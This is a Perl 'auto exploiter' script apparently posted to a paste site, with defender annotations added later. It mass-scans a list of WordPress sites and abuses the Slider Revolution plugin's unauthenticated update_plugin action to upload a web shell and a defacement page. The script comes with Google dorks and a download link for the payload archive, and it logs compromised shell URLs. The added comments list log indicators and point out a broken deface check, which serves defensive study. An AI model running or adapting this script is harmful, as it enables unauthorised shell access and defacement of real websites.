0xspade

Revslider Auto Exploiter

Sep 6th, 2016
  1. #!/usr/bin/perl
  2. #  
  3. #  Dork 1: inurl:/wp-content/plugins/revslider/
  4. #  Dork 2: inurl:/wp-admin/admin-ajax.php
  5. #
  6. #  
  7. #
  8. #  Don't Change right Noobs Oky #Oussama911 :3
  9. #  +------------------------------------------------------------------------------------------------+
  10. #  |  Warning : Download This Archive .zip and past in folder Bin of Perl for Use this Script !!!!  |
  11. #  |  Link : http://www.gulfup.com/?3bDGf4 !!!!                                                        |
  12. #  |                                                                                                |
  13. #  +------------------------------------------------------------------------------------------------+
  14. #
  15. # -> Title: Auto Exploiter Slider Revolution Shell Upload
  16. # -> Author: Oussama911
  17. #
  18.  
  19. use LWP::UserAgent;
  20.  
  # Analyst summary: flat script that reads a list of base URLs from the file named in
  # $ARGV[0] and, for each one, probes wp-admin/admin-ajax.php, posts a plugin-update
  # request with a local revslider.zip, then fetches two fixed paths to see whether
  # files from that archive are being served. Results are printed and appended to
  # Shells.txt. There is no `use strict` / `use warnings`; $target is a package global.
  # Log and filesystem artefacts visible in this listing that a defender can search for:
  #   - POST to /wp-admin/admin-ajax.php with action=revslider_ajax_action and
  #     client_action=update_plugin, sent with an empty Cookie header
  #   - GET of /wp-content/plugins/revslider/temp/update_extract/revslider/up.php
  #   - GET of /leet.html in the web root
  #   - the fixed Chrome/26 User-Agent string set below (trivially changed, so treat
  #     it as a weak indicator only)
  # Clears the terminal; the command is chosen from $^O (cls on MSWin32, clear otherwise).
  21. system(($^O eq 'MSWin32') ? 'cls' : 'clear');
  22.  
  # Prints the banner. head() is declared further down, inside the while body; named
  # subs are installed at compile time, so the call resolves here.
  23. head();
  24.  
  25. my $usage = " \nperl $0 <list.txt>\n perl $0 lista.txt";
  26. die "$usage" unless $ARGV[0];
  27.  
  # Two-argument open on a bareword handle with the command-line argument interpolated
  # into the mode string. NOTE(review): anyone detonating this sample in a sandbox
  # should be aware the argument is parsed by two-arg open rather than treated as a
  # plain filename.
  28. open(tarrget,"<$ARGV[0]") or die "$!";
  # One target per input line; the line is used verbatim as the URL prefix.
  29. while(<tarrget>){
  30. chomp($_);
  31. $target = $_;
  32.  
  33. my $path = "wp-admin/admin-ajax.php";
  34.  
  35. print "\nTarget => $target\n";
  36.  
  # A fresh user agent per target. verify_hostname => 0 turns off TLS hostname
  # verification, so responses are accepted from any certificate holder.
  37. my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
  38. $ua->timeout(10);
  39. $ua->agent("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31");
  # Reachability probe only: any successful HTTP response from admin-ajax.php is
  # treated as "possibly vulnerable"; nothing about the plugin is checked here.
  40. my $req = $ua->get("$target/$path");
  41. if($req->is_success) {
  42. print "\n  [+] Xploit Possibility Work :3\n \n";
  43.  
  44.  
  45.  
  46. print "  [*] Try Exploiting Vulnerability\n";
  47. print "  [*] Xploiting $target\n";
  48.  
  # Multipart form POST: two text fields plus the local file revslider.zip as
  # update_file. The Cookie header is empty, so no WordPress session is presented.
  # Defender note: this field combination on admin-ajax.php without a session cookie
  # is a precise WAF / log-search signature; the durable fix is running a
  # vendor-patched plugin release (version not stated on this page).
  49. my $exploit = $ua->post("$target/$path", Cookie => "", Content_Type => "form-data", Content => [action => "revslider_ajax_action", client_action => "update_plugin", update_file => ["revslider.zip"]]);
  50.  
  51. print "  [*] Sent payload\n";
  52.  
  # The script reads this specific response text as its success marker.
  53. if ($exploit->decoded_content =~ /Wrong update extracted folder/) {
  54. print "  [+] Payload successfully executed\n";
  55.  
  56. print "  [*] Checking if shell was uploaded\n";
  # Fetches a fixed path under the plugin's temp/update_extract directory; any body
  # containing "<br>" counts as a hit. Defender note: unexpected files under this
  # directory are worth a file-integrity check on hosts that run the plugin.
  57. my $check = $ua->get("$target/wp-content/plugins/revslider/temp/update_extract/revslider/up.php")->content;
  58. if($check =~/<br>/) {
  59.  
  60.     print "  [+] Shell successfully uploaded\n";
  # Appends the URL to Shells.txt in the current directory; the open is unchecked, so
  # a failure to open the file is silent.
  61.     open(save, '>>Shells.txt');
  62.     print save "shell : $target/wp-content/plugins/revslider/temp/update_extract/revslider/up.php?zeb\n";
  63.     close(save);
  64.  
  65.  
  66. print "  [*] Checking if Deface was uploaded now\n";
  67.  
  68. my $def = $ua->get("$target/leet.html")->content;
  # NOTE(review): this is `$def = ~/Hacked/` (assignment of a bitwise complement), not
  # `$def =~ /Hacked/`. The pattern is matched against $_ and the fetched body is
  # overwritten, so this branch does not test the response; the "Deface uploaded"
  # line in the tool's output is not evidence that /leet.html exists on the host.
  69. if($def = ~/Hacked/) {
  70.  
  71. print "  [+] Deface uploaded successfull\n";
  72.  
  73.  
  74. } else {print "   [-] Deface not Uploaded :/"; }
  75. } else { print "  [-] I'think Shell Not Uploaded :/\n"; }
  76. } else {
  77. print "  [-] Payload failed: Fail\n";
  78. print "\n";
  79.  
  80. }
  81. } else { print "\n [-]Xploit Fail \n"}
  82.  
  # Banner printer, textually nested in the while body; it takes no arguments and
  # only writes four lines to STDOUT.
  83. sub head {
  84. print "\t   +===============================================\n";
  85. print "\t   | Auto Exploiter Revslider Shell Upload \n";
  86. print "\t   | Author: Oussama911\n";
  87. print "\t   +===============================================\n";
  88. }
  # Closes the while loop opened at listing line 29; the input handle is never closed
  # explicitly.
  89. }